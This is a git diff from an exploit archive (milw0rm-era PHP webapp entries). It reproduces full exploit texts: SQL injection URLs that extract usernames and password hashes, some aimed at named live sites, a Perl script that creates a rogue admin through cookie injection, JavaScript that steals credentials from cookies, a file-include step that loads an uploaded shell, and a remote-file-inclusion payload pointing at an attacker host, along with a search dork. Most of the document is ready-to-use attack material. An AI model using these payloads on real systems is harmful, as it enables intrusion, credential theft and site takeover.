@@ -1,22 +1,22 @@ -Kasseler CMS 1.1.0, 1.2.0 Lite SQL Injection - -Author: ~!Dok_tOR!~ -Date found: 13.09.08 -Product: Kasseler CMS -Version: 1.1.0, 1.2.4 -URL: www.kasseler-cms.net -Vulnerability Class: SQL Injection - -http://localhost/[installdir]/index.php?module=News&do=View&nid=1'+and+1=2+union+select+1,2,concat_ws(0x3a,user_name,user_password,user_email),4,user(),version(),7,8,9,10,11,12,database(),14,15,16,17,18+from+kasseler_users+where+uid=1/* - -http://localhost/[installdir]/index.php?module=Voting&do=Result&vid=1'+union+select+1,concat_ws(0x3a,user_name,user_password,user_email),3,4,user(),6,version(),8,9,10,11,12,13,14,15+from+kasseler_users+where+uid=1/* - -http://localhost/[installdir]/index.php?module=Forum&do=ShowForum&fid=1'+union+select+1,2,3,concat_ws(0x3a,user_name,user_password,user_email),5,user(),database(),8,9,10,11,version(),13,14,15+from+kasseler_users+where+uid=1/* - -http://localhost/[installdir]/index.php?module=Forum&do=ShowTopic&tid=706'+union+select+1,2,3,4,concat_ws(0x3a,user_name,user_password,user_email),6,7,user(),9,10,11,version(),13,14,15,16,17,18+from+kasseler_users+where+uid=1/* - -http://localhost/[installdir]/index.php?module=Account&do=UserInfo&uname=dok'+union+select+1,2,3,4,concat_ws(0x3a,user_name,user_password,user_email),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+kasseler_users+where+uid=1/* - -http://localhost/[installdir]/index.php?module=TopSites+1'+and+1=2+union+select+1,concat_ws(0x3a,user_name,user_password,user_email),3,4,5+from+kasseler_users+where+uid=1/* - -# milw0rm.com [2008-09-14] +Kasseler CMS 1.1.0, 1.2.0 Lite SQL Injection + +Author: ~!Dok_tOR!~ +Date found: 13.09.08 +Product: Kasseler CMS +Version: 1.1.0, 1.2.4 +URL: www.kasseler-cms.net +Vulnerability Class: SQL Injection + 
+http://localhost/[installdir]/index.php?module=News&do=View&nid=1'+and+1=2+union+select+1,2,concat_ws(0x3a,user_name,user_password,user_email),4,user(),version(),7,8,9,10,11,12,database(),14,15,16,17,18+from+kasseler_users+where+uid=1/* + +http://localhost/[installdir]/index.php?module=Voting&do=Result&vid=1'+union+select+1,concat_ws(0x3a,user_name,user_password,user_email),3,4,user(),6,version(),8,9,10,11,12,13,14,15+from+kasseler_users+where+uid=1/* + +http://localhost/[installdir]/index.php?module=Forum&do=ShowForum&fid=1'+union+select+1,2,3,concat_ws(0x3a,user_name,user_password,user_email),5,user(),database(),8,9,10,11,version(),13,14,15+from+kasseler_users+where+uid=1/* + +http://localhost/[installdir]/index.php?module=Forum&do=ShowTopic&tid=706'+union+select+1,2,3,4,concat_ws(0x3a,user_name,user_password,user_email),6,7,user(),9,10,11,version(),13,14,15,16,17,18+from+kasseler_users+where+uid=1/* + +http://localhost/[installdir]/index.php?module=Account&do=UserInfo&uname=dok'+union+select+1,2,3,4,concat_ws(0x3a,user_name,user_password,user_email),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+kasseler_users+where+uid=1/* + +http://localhost/[installdir]/index.php?module=TopSites+1'+and+1=2+union+select+1,concat_ws(0x3a,user_name,user_password,user_email),3,4,5+from+kasseler_users+where+uid=1/* + +# milw0rm.com [2008-09-14] diff --git a/platforms/php/webapps/6461.txt b/platforms/php/webapps/6461.txt index 3c5067740..af016007c 100755 --- a/platforms/php/webapps/6461.txt +++ b/platforms/php/webapps/6461.txt 
@@ -1,52 +1,52 @@ -############################################################## -Fantastico In all Version Cpanel 11.x <= local File Include - -############################################################## - - -Must login to :2082 -To break the protection mod_security & safe_mode: off & Disable functions : all none - - - -Vulnerable Code - -$licensing_servers=$fantasticopath . "/includes/enc_licensing_servers.php"; -if (is_file($licensing_servers)) - { - include($licensing_servers); - - -in - -http://xx.com:2082/frontend/x/fantastico/includes/xml.php - - -Exploit >> - -First Create directory Let the name /includes/ and upload Shell.php in /includes/ Then rename it to enc_licensing_servers.php - - -:::xploit:::: - -http://xxx.com:2082/frontend/x/fantastico/includes/xml.php?fantasticopath=/home/user - - - -################################################### - -Discoverd By : joker_1 - - - -for info : pl57@msn.com - - - -################################################### - -Special Greetings :- sniper-sa.com & Group XP & Alm3reFh.Com & Genral kbkb & step on the snow & red trigger & qalbhamad & saudi star - -################################################### - -# milw0rm.com [2008-09-14] +############################################################## +Fantastico In all Version Cpanel 11.x <= local File Include + +############################################################## + + +Must login to :2082 +To break the protection mod_security & safe_mode: off & Disable functions : all none + + + +Vulnerable Code + +$licensing_servers=$fantasticopath . 
"/includes/enc_licensing_servers.php"; +if (is_file($licensing_servers)) + { + include($licensing_servers); + + +in + +http://xx.com:2082/frontend/x/fantastico/includes/xml.php + + +Exploit >> + +First Create directory Let the name /includes/ and upload Shell.php in /includes/ Then rename it to enc_licensing_servers.php + + +:::xploit:::: + +http://xxx.com:2082/frontend/x/fantastico/includes/xml.php?fantasticopath=/home/user + + + +################################################### + +Discoverd By : joker_1 + + + +for info : pl57@msn.com + + + +################################################### + +Special Greetings :- sniper-sa.com & Group XP & Alm3reFh.Com & Genral kbkb & step on the snow & red trigger & qalbhamad & saudi star + +################################################### + +# milw0rm.com [2008-09-14] diff --git a/platforms/php/webapps/6462.pl b/platforms/php/webapps/6462.pl index f8574069b..19a066f71 100755 --- a/platforms/php/webapps/6462.pl +++ b/platforms/php/webapps/6462.pl 
@@ -1,66 +1,66 @@ -#!/usr/bin/perl -# ---------------------------------------------------------- -# CzarNews <= v1.20 (Cookie) Remote SQL Injection Exploit -# Perl Exploit - Add a new admin with your credentials! -# Discovered On: 15/09/2008 -# Discovered By: StAkeR - StAkeR[at]hotmail[dot]it -# ---------------------------------------------------------- -# Usage: perl http://localhost/cms StAkeR obscure -# ---------------------------------------------------------- - -use strict; -use LWP::UserAgent; - -my $email = 'some@example.net'; -my ($hostname,$username,$password) = @ARGV; -my $request = undef; -my $http_s = new LWP::UserAgent or die $!; - -$hostname = ($hostname =~ /^http:\/\/(.+?)$/) ? $ARGV[0] : banner(); -banner() unless $username and $password; - -$http_s->agent("Mozilla/4.5 [en] (Win95; U)"); -$http_s->timeout(1); -$http_s->default_header('Cookie' => "recook=' or '1=1,' or '1=1"); - -$request = $http_s->post($hostname."/cn_users.php", - [ - user => $username, - pass => $password, - email => $email, - allcats => "all", - admin => "off", - news => "on", - images => "on", - users => "on", - categories => "on", - config => "on", - words => "on", - op => "add", - id => '', - go => "true", - submit => "Add+User" - ]); - -if($request->is_success) -{ - if($request->content =~ /has been added/i) - { - print "[+] Added New Administrator: $username & $password\n"; - } - else - { - print "[!] Exploit Failed!\n"; - print "[!] Site Not Vulnerable\n"; - } -} - - -sub banner -{ - print "[+] CzarNews <= v1.20 Remote SQL Injection Exploit (add new admin)\n"; - print "[+] Usage: perl exploit.pl [host] [username] [password]\n"; - return exit; -} - -# milw0rm.com [2008-09-15] +#!/usr/bin/perl +# ---------------------------------------------------------- +# CzarNews <= v1.20 (Cookie) Remote SQL Injection Exploit +# Perl Exploit - Add a new admin with your credentials! 
+# Discovered On: 15/09/2008 +# Discovered By: StAkeR - StAkeR[at]hotmail[dot]it +# ---------------------------------------------------------- +# Usage: perl http://localhost/cms StAkeR obscure +# ---------------------------------------------------------- + +use strict; +use LWP::UserAgent; + +my $email = 'some@example.net'; +my ($hostname,$username,$password) = @ARGV; +my $request = undef; +my $http_s = new LWP::UserAgent or die $!; + +$hostname = ($hostname =~ /^http:\/\/(.+?)$/) ? $ARGV[0] : banner(); +banner() unless $username and $password; + +$http_s->agent("Mozilla/4.5 [en] (Win95; U)"); +$http_s->timeout(1); +$http_s->default_header('Cookie' => "recook=' or '1=1,' or '1=1"); + +$request = $http_s->post($hostname."/cn_users.php", + [ + user => $username, + pass => $password, + email => $email, + allcats => "all", + admin => "off", + news => "on", + images => "on", + users => "on", + categories => "on", + config => "on", + words => "on", + op => "add", + id => '', + go => "true", + submit => "Add+User" + ]); + +if($request->is_success) +{ + if($request->content =~ /has been added/i) + { + print "[+] Added New Administrator: $username & $password\n"; + } + else + { + print "[!] Exploit Failed!\n"; + print "[!] Site Not Vulnerable\n"; + } +} + + +sub banner +{ + print "[+] CzarNews <= v1.20 Remote SQL Injection Exploit (add new admin)\n"; + print "[+] Usage: perl exploit.pl [host] [username] [password]\n"; + return exit; +} + +# milw0rm.com [2008-09-15] diff --git a/platforms/php/webapps/6464.txt b/platforms/php/webapps/6464.txt index 3be787f8e..a57318073 100755 --- a/platforms/php/webapps/6464.txt +++ b/platforms/php/webapps/6464.txt 
@@ -1,38 +1,38 @@ -czarNews Account Hijacking <= 1.20 user and password Leak ----------------------------------------------------------- - - Author: Maycon Maia Vitali ( 0ut0fBound ) -Contact: mayconmaia at yahoo dot com dot br - http://maycon.gsec.com.br - -Original Xploit by StAkeR ( http://www.milw0rm.com/exploits/6462 ) - - -Gerenal Xploit: ---------------- - -1) Go to some page with CzarNews 1.20. You are in the 'Login Page' -2) Put in the URL: javascript:document.cookie="recook=' or ''=',' or -''='";void(0); -3) Refresh the page. Now you are logged in. -4) Put in the URL: -javascript:c=document.cookie;p=c.substr(c.lastIndexOf('=')+1).split(/%../);a -lert("Login: " + p[0] + "\nPass: " + p[1]);void(0); -5) With this you getted the current user and password - -Attacking Especific User: -------------------------- - -If you have some user that you need Xploit, You can change the step 2 by -this: - -2) Put in the URL: -javascript:document.cookie="recook=[USER],'+or+''='";void(0); - -Where [USER] need to be replaced with user name (e.g. admin) - - -enjoy, -0ut0fBound - -# milw0rm.com [2008-09-15] +czarNews Account Hijacking <= 1.20 user and password Leak +---------------------------------------------------------- + + Author: Maycon Maia Vitali ( 0ut0fBound ) +Contact: mayconmaia at yahoo dot com dot br + http://maycon.gsec.com.br + +Original Xploit by StAkeR ( http://www.milw0rm.com/exploits/6462 ) + + +Gerenal Xploit: +--------------- + +1) Go to some page with CzarNews 1.20. You are in the 'Login Page' +2) Put in the URL: javascript:document.cookie="recook=' or ''=',' or +''='";void(0); +3) Refresh the page. Now you are logged in. 
+4) Put in the URL: +javascript:c=document.cookie;p=c.substr(c.lastIndexOf('=')+1).split(/%../);a +lert("Login: " + p[0] + "\nPass: " + p[1]);void(0); +5) With this you getted the current user and password + +Attacking Especific User: +------------------------- + +If you have some user that you need Xploit, You can change the step 2 by +this: + +2) Put in the URL: +javascript:document.cookie="recook=[USER],'+or+''='";void(0); + +Where [USER] need to be replaced with user name (e.g. admin) + + +enjoy, +0ut0fBound + +# milw0rm.com [2008-09-15] diff --git a/platforms/php/webapps/6465.txt b/platforms/php/webapps/6465.txt index 24f9c586d..836ab7985 100755 --- a/platforms/php/webapps/6465.txt +++ b/platforms/php/webapps/6465.txt 
@@ -1,27 +1,27 @@ -# Pre Real Estate Listings (search.php c) Remote SQL Injection Vulnerability -# url: http://preproject.com/ -# -# Author: JosS -# mail: sys-project[at]hotmail[dot]com -# site: http://spanish-hackers.com -# team: Spanish Hackers Team - [SHT] -# -# This was written for educational purpose. Use it at your own risk. -# Author will be not responsible for any damage. -# -# Greetz To: All Hackers and milw0rm website - - -(SQL-way): http://www.localhost/search.php?c=(135['foo]) - -PoC: 135'+union+all+select+1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, -1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,concat(user(),char(32,35),database(),char(32,35),version()),1/* - -live demo: - -http://preproject.com/ulisting/search.php?c=135'+union+all+select+1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, -1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,concat(user(),char(32,35),database(),char(32,35),version()),1/* - -- In memory of rgod - - -# milw0rm.com [2008-09-15] +# Pre Real Estate Listings (search.php c) Remote SQL Injection Vulnerability +# url: http://preproject.com/ +# +# Author: JosS +# mail: sys-project[at]hotmail[dot]com +# site: http://spanish-hackers.com +# team: Spanish Hackers Team - [SHT] +# +# This was written for educational purpose. Use it at your own risk. +# Author will be not responsible for any damage. 
+# +# Greetz To: All Hackers and milw0rm website + + +(SQL-way): http://www.localhost/search.php?c=(135['foo]) + +PoC: 135'+union+all+select+1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, +1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,concat(user(),char(32,35),database(),char(32,35),version()),1/* + +live demo: + +http://preproject.com/ulisting/search.php?c=135'+union+all+select+1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, +1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,concat(user(),char(32,35),database(),char(32,35),version()),1/* + +- In memory of rgod - + +# milw0rm.com [2008-09-15] diff --git a/platforms/php/webapps/6466.txt b/platforms/php/webapps/6466.txt index c2161d99c..466846e15 100755 --- a/platforms/php/webapps/6466.txt +++ b/platforms/php/webapps/6466.txt 
@@ -1,41 +1,41 @@ -################################################################################################################# -[+] Link Bid Script 1.5 Multiple Remote SQL Injection -[+] Discovered By SirGod -[+] wWw.MorTal-TeaM.OrG -[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,Raven,Nytr0gen,str0ke -################################################################################################################# - -[+] Remote SQL Injection - - - - Note : For PoC 2 you need administrative rights. - - PoC 1 : - - http://[target]/[path]/upgrade.php?ucat=[SQL] - - Example 1 : - - http://127.0.0.1/linkbid/upgrade.php?ucat=-1086 union all -select 1,2,3,version(),database(),6,user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35-- - - Live Demo 1 : - - http://demo.linkbidscript.com/upgrade.php?ucat=-1086 union all -select 1,2,3,version(),database(),6,user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35-- - - ------------------------------------------------------------------------------------------------------------------ - - PoC 2 : - - http://[target]/[path]/linkadmin/edit.php?id=[SQL] - - Example 2 : - - http://127.0.0.1/linkbid/linkadmin/edit.php?id=-1 union all -select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35-- - -################################################################################################################# - -# milw0rm.com [2008-09-15] +################################################################################################################# +[+] Link Bid Script 1.5 Multiple Remote SQL Injection +[+] Discovered By SirGod +[+] wWw.MorTal-TeaM.OrG +[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,Raven,Nytr0gen,str0ke +################################################################################################################# + +[+] Remote SQL Injection + 
+ + - Note : For PoC 2 you need administrative rights. + + PoC 1 : + + http://[target]/[path]/upgrade.php?ucat=[SQL] + + Example 1 : + + http://127.0.0.1/linkbid/upgrade.php?ucat=-1086 union all +select 1,2,3,version(),database(),6,user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35-- + + Live Demo 1 : + + http://demo.linkbidscript.com/upgrade.php?ucat=-1086 union all +select 1,2,3,version(),database(),6,user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35-- + + +----------------------------------------------------------------------------------------------------------------- + + PoC 2 : + + http://[target]/[path]/linkadmin/edit.php?id=[SQL] + + Example 2 : + + http://127.0.0.1/linkbid/linkadmin/edit.php?id=-1 union all +select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35-- + +################################################################################################################# + +# milw0rm.com [2008-09-15] diff --git a/platforms/php/webapps/6467.txt b/platforms/php/webapps/6467.txt index 982ec0d0c..1f8556291 100755 --- a/platforms/php/webapps/6467.txt +++ b/platforms/php/webapps/6467.txt 
@@ -1,33 +1,33 @@ -######################################################################################################################### -[+] iScripts EasyIndex (produid) Remote SQL Injection -[+] Discovered By SirGod -[+] wWw.MorTal-TeaM.OrG -[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,Raven,Nytr0gen,str0ke -######################################################################################################################## - [+] Remote SQL Injection - - - PoC : - - http://[target]/[path]/detaillist.php?produid=[SQL] - - - Example : - - http://127.0.0.1/iscripts/detaillist.php?produid=-1 union all -select 1,2,3,4,version(),database(),user(),8,9,10,11,12,13,14-- - - - Live Demo : - - http://www.dawsonvalley.net/business/detaillist.php?produid=-1 -union all select -1,2,3,4,version(),database(),user(),8,9,10,11,12,13,14-- - - - - Note : the number of colums can vary. - - -########################################################################################################################## - -# milw0rm.com [2008-09-16] +######################################################################################################################### +[+] iScripts EasyIndex (produid) Remote SQL Injection +[+] Discovered By SirGod +[+] wWw.MorTal-TeaM.OrG +[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,Raven,Nytr0gen,str0ke +######################################################################################################################## + [+] Remote SQL Injection + + + PoC : + + http://[target]/[path]/detaillist.php?produid=[SQL] + + + Example : + + http://127.0.0.1/iscripts/detaillist.php?produid=-1 union all +select 1,2,3,4,version(),database(),user(),8,9,10,11,12,13,14-- + + + Live Demo : + + http://www.dawsonvalley.net/business/detaillist.php?produid=-1 +union all select +1,2,3,4,version(),database(),user(),8,9,10,11,12,13,14-- + + + - Note : the number of colums can vary. 
+ + +########################################################################################################################## + +# milw0rm.com [2008-09-16] diff --git a/platforms/php/webapps/6468.txt b/platforms/php/webapps/6468.txt index 7d22f5ef7..707b47c6b 100755 --- a/platforms/php/webapps/6468.txt +++ b/platforms/php/webapps/6468.txt 
@@ -1,121 +1,121 @@ -____________________ ___ ___ ________ -\_ _____/\_ ___ \ / | \\_____ \ - | __)_ / \ \// ~ \/ | \ - | \\ \___\ Y / | \ -/_______ / \______ /\___|_ /\_______ / - \/ \/ \/ \/ - - .OR.ID -ECHO_ADV_101$2008 - ------------------------------------------------------------------------------------------ -[ECHO_ADV_101$2008] Attachmax Dolphin <= 2.1.0 Multiple Vulnerability ------------------------------------------------------------------------------------------ - -Author : K-159 -Date : September, 16 th 2008 -Location : Jakarta, Indonesia -Web : http://e-rdc.org/v1/news.php?readmore=108 -Critical Lvl : High -Impact : System access -Where : From Remote ---------------------------------------------------------------------------- - -Affected software description: -~~~~~~~~~~~~~~~~~~~~~~~~~~~ - -Application : Attachmax Dolphin -version : <= 2.1.0 -Vendor : http://www.attachmax.com/ -Description : - -Attachmax allows you to run your very own youtube Video Community site, just like popular Videos sites -such as youtube, dailymotion and revver. Additionally Attachmax includes the ability for Images and Files, -following the trend of other popular File Sharing communities such as Imageshack and Rapidshare. -So not only do you get a fully functional Video Script, but a complete File Sharing Website. - ---------------------------------------------------------------------------- - -Vulnerability: -~~~~~~~~~~~~~ - -1. Remote File Inclusion Vulnerability - -Input passed to the "rel_path" parameter in config.php page is not properly verified before being used -to include files.This can be exploited to include arbitrary files from local or external resources. -Successful exploitation requires that "register_globals" is enabled. - - -Poc/Exploit: -~~~~~~~~~ -http://www.example.com/[path]/config.php?rel_path=http://www.attacker.com/evil? - - -2. 
File info disclosure Vulnerability - -File info.php in main folder not protected to see directly from browser and could allow an attacker -to obtain sensitive information from the server. - -Poc: -~~~ -http://www.example.com/[path]/info.php - - -3. Blind SQL Injection Vulnerability. - -Input passed to the "category" parameter in search.php page is not properly verified before being used -in an sql query. -This can be exploited thru the browser to manipulate SQL queries and pull the username and password -from users in plain text. - -Poc/Exploit: -~~~~~~~~~~~ -http://www.example.com/[path]/index.php?page=Search&category=[BlindSQL] - - - -Dork: -~~~~ -Google : "2007 Attachmax" or inurl:"controller.php?page=profile" - - -Solution: -~~~~~~ - -- Edit the source code to ensure that input is properly verified. -- Turn off register_globals in php.ini -- Rename info.php. - -Timeline: -~~~~~~~~ - -- 24 - 08 - 2008 bug found -- 02 - 09 - 2008 vendor contacted -- 16 - 09 - 2008 advisory released ---------------------------------------------------------------------------- - -Shoutz: -~~~~ -~ "Happy 5th Anniversary" for ECHO. -~ ping - my dearest wife, zautha - my beloved son, and my beloved next children. 
-~ "Happy Wedding" for (y3dips,the_day,Negatif),moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,pushm0v,az001, -the_hydra,neng chika, str0ke -~ everybody [at] SCAN-NUSANTARA and SCAN-ASSOCIATES -~ SK,pokleyzz,Abond,an0maly,cybertank, super_temon, b120t0,inggar,fachri,adi,rahmat,indra -~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,sakitjiwa,x16,cyb3rh3b -~ dr188le,SinChan,h4ntu,cow_1seng,poniman_coy,paman_gembul,ketut,rizal,cR4SH3R, -kuntua, stev_manado,nofry,k1tk4t,0pt1c -~ newbie_hacker@yahoogroups.com -~ macaholic.info, unitiga.com, mac.web.id -~ #aikmel #e-c-h-o @irc.dal.net - ---------------------------------------------------------------------------- -Contact: -~~~~~ - -K-159 || echo|staff || adv[at]e-rdc[dot]org -Homepage: http://www.e-rdc.org/ - --------------------------------- [ EOF ] ---------------------------------- - -# milw0rm.com [2008-09-16] +____________________ ___ ___ ________ +\_ _____/\_ ___ \ / | \\_____ \ + | __)_ / \ \// ~ \/ | \ + | \\ \___\ Y / | \ +/_______ / \______ /\___|_ /\_______ / + \/ \/ \/ \/ + + .OR.ID +ECHO_ADV_101$2008 + +----------------------------------------------------------------------------------------- +[ECHO_ADV_101$2008] Attachmax Dolphin <= 2.1.0 Multiple Vulnerability +----------------------------------------------------------------------------------------- + +Author : K-159 +Date : September, 16 th 2008 +Location : Jakarta, Indonesia +Web : http://e-rdc.org/v1/news.php?readmore=108 +Critical Lvl : High +Impact : System access +Where : From Remote +--------------------------------------------------------------------------- + +Affected software description: +~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Application : Attachmax Dolphin +version : <= 2.1.0 +Vendor : http://www.attachmax.com/ +Description : + +Attachmax allows you to run your very own youtube Video Community site, just like popular Videos sites +such as youtube, dailymotion and revver. 
Additionally Attachmax includes the ability for Images and Files, +following the trend of other popular File Sharing communities such as Imageshack and Rapidshare. +So not only do you get a fully functional Video Script, but a complete File Sharing Website. + +--------------------------------------------------------------------------- + +Vulnerability: +~~~~~~~~~~~~~ + +1. Remote File Inclusion Vulnerability + +Input passed to the "rel_path" parameter in config.php page is not properly verified before being used +to include files.This can be exploited to include arbitrary files from local or external resources. +Successful exploitation requires that "register_globals" is enabled. + + +Poc/Exploit: +~~~~~~~~~ +http://www.example.com/[path]/config.php?rel_path=http://www.attacker.com/evil? + + +2. File info disclosure Vulnerability + +File info.php in main folder not protected to see directly from browser and could allow an attacker +to obtain sensitive information from the server. + +Poc: +~~~ +http://www.example.com/[path]/info.php + + +3. Blind SQL Injection Vulnerability. + +Input passed to the "category" parameter in search.php page is not properly verified before being used +in an sql query. +This can be exploited thru the browser to manipulate SQL queries and pull the username and password +from users in plain text. + +Poc/Exploit: +~~~~~~~~~~~ +http://www.example.com/[path]/index.php?page=Search&category=[BlindSQL] + + + +Dork: +~~~~ +Google : "2007 Attachmax" or inurl:"controller.php?page=profile" + + +Solution: +~~~~~~ + +- Edit the source code to ensure that input is properly verified. +- Turn off register_globals in php.ini +- Rename info.php. + +Timeline: +~~~~~~~~ + +- 24 - 08 - 2008 bug found +- 02 - 09 - 2008 vendor contacted +- 16 - 09 - 2008 advisory released +--------------------------------------------------------------------------- + +Shoutz: +~~~~ +~ "Happy 5th Anniversary" for ECHO. 
+~ ping - my dearest wife, zautha - my beloved son, and my beloved next children. +~ "Happy Wedding" for (y3dips,the_day,Negatif),moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,pushm0v,az001, +the_hydra,neng chika, str0ke +~ everybody [at] SCAN-NUSANTARA and SCAN-ASSOCIATES +~ SK,pokleyzz,Abond,an0maly,cybertank, super_temon, b120t0,inggar,fachri,adi,rahmat,indra +~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,sakitjiwa,x16,cyb3rh3b +~ dr188le,SinChan,h4ntu,cow_1seng,poniman_coy,paman_gembul,ketut,rizal,cR4SH3R, +kuntua, stev_manado,nofry,k1tk4t,0pt1c +~ newbie_hacker@yahoogroups.com +~ macaholic.info, unitiga.com, mac.web.id +~ #aikmel #e-c-h-o @irc.dal.net + +--------------------------------------------------------------------------- +Contact: +~~~~~ + +K-159 || echo|staff || adv[at]e-rdc[dot]org +Homepage: http://www.e-rdc.org/ + +-------------------------------- [ EOF ] ---------------------------------- + +# milw0rm.com [2008-09-16] diff --git a/platforms/php/webapps/6469.txt b/platforms/php/webapps/6469.txt index ddc55a9e0..1944f7896 100755 --- a/platforms/php/webapps/6469.txt +++ b/platforms/php/webapps/6469.txt 
@@ -1,45 +1,45 @@ -########################################################### -# -# ___ __ __ __ __ -# /\_ \ /\ \\ \ /\ \/\ \ -# ____\//\ \ \ \ \\ \ __ _ __ _\ \ \ \ \ ____ -# /',__\ \ \ \ \ \ \\ \_ /\ \/'\\ \/'\\ \ \ \ \/\_ ,`\ -# /\__, `\ \_\ \_\ \__ ,__\\> <\\> <\\ \ \_\ \/_/ /_ -# \/\____/ /\____\\/_/\_\_//\_/\_\\_/\_\ \ \_____\/\____\ -# \/___/ \/____/ \/_/ \//\/_///\/_/ \/_____/\/____/ -# -# security breakd0wn! -########################################################### -# -# Title: Gonafish LinksCaffePRO 4.5 (index.php) SQL Injection Vulnerability -# Vendor: http://gonafish.com/ -# Vulnerable Version: 4.5 -# Fix: N/A -# -########################################################### -# -# disc0vered: sl4xUz -# c0ntact: sl4x.xuz[at]gmail[dot]com -# d0rk: "negative" -# stop lammo -# -########################################################### - -###################### - 1. Information -###################### - LinksCaffePRO is a MySQL database driven link indexing script written in PHP 4. Using the admin script you have full control to add/modify/remove any link(s) or categorie(s). - -###################### - 2. Vulnerabilities -###################### - SQL Injection in "index.php" in the "idd" parameter. - -###################### - 3. PoC -###################### - http://localhost/path/index.php?action=deadlink&idd=-1+union+select+1,2,version(),4,concat(user(),0x3a,database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26-- - -########################################################### - -# milw0rm.com [2008-09-16] +########################################################### +# +# ___ __ __ __ __ +# /\_ \ /\ \\ \ /\ \/\ \ +# ____\//\ \ \ \ \\ \ __ _ __ _\ \ \ \ \ ____ +# /',__\ \ \ \ \ \ \\ \_ /\ \/'\\ \/'\\ \ \ \ \/\_ ,`\ +# /\__, `\ \_\ \_\ \__ ,__\\> <\\> <\\ \ \_\ \/_/ /_ +# \/\____/ /\____\\/_/\_\_//\_/\_\\_/\_\ \ \_____\/\____\ +# \/___/ \/____/ \/_/ \//\/_///\/_/ \/_____/\/____/ +# +# security breakd0wn! 
+########################################################### +# +# Title: Gonafish LinksCaffePRO 4.5 (index.php) SQL Injection Vulnerability +# Vendor: http://gonafish.com/ +# Vulnerable Version: 4.5 +# Fix: N/A +# +########################################################### +# +# disc0vered: sl4xUz +# c0ntact: sl4x.xuz[at]gmail[dot]com +# d0rk: "negative" +# stop lammo +# +########################################################### + +###################### + 1. Information +###################### + LinksCaffePRO is a MySQL database driven link indexing script written in PHP 4. Using the admin script you have full control to add/modify/remove any link(s) or categorie(s). + +###################### + 2. Vulnerabilities +###################### + SQL Injection in "index.php" in the "idd" parameter. + +###################### + 3. PoC +###################### + http://localhost/path/index.php?action=deadlink&idd=-1+union+select+1,2,version(),4,concat(user(),0x3a,database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26-- + +########################################################### + +# milw0rm.com [2008-09-16] diff --git a/platforms/php/webapps/647.pl b/platforms/php/webapps/647.pl index e2f372e5a..ea04d3000 100755 --- a/platforms/php/webapps/647.pl +++ b/platforms/php/webapps/647.pl @@ -139,6 +139,6 @@ if ($answer =~ /^_START_/) { $on = 1; } print "[-] EXPLOIT FAILED\r\n"; print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n"; -### EOF ### - -# milw0rm.com [2004-11-22] +### EOF ### + +# milw0rm.com [2004-11-22] diff --git a/platforms/php/webapps/6473.txt b/platforms/php/webapps/6473.txt index 273e5d52a..cca823bde 100755 --- a/platforms/php/webapps/6473.txt +++ b/platforms/php/webapps/6473.txt 
@@ -1,36 +1,36 @@ --=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -phpRealty <= 0.03 (INC) Remote File Inclusion Vulnerability --=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- - -$ Script: phpRealty -$ Version: <= 0.03 -$ File affected: manager/static/view.php -$ Download: http://sourceforge.net/project/showfiles.php?group_id=204745 - - -Found by ka0x -D.O.M Labs - Security Researchers -- www.domlabs.org - - -vuln code: - -------------- - -11: if(!isset($_GET['propID']) || !is_numeric($_GET['propID']) || empty($_GET['propID'])){ -13: return; - - -17: include($INC."curr_conv.class.php"); // -------->>> Vuln Line!! - // the var $INC isn't declared - -------------- - - -Proof of Concept: -http://[host]/[phprealty-path]/manager/static/view.php?propID=0&INC= [ S H E L L ] ? - - -__EOF__ - -# milw0rm.com [2008-09-17] +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- +phpRealty <= 0.03 (INC) Remote File Inclusion Vulnerability +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + +$ Script: phpRealty 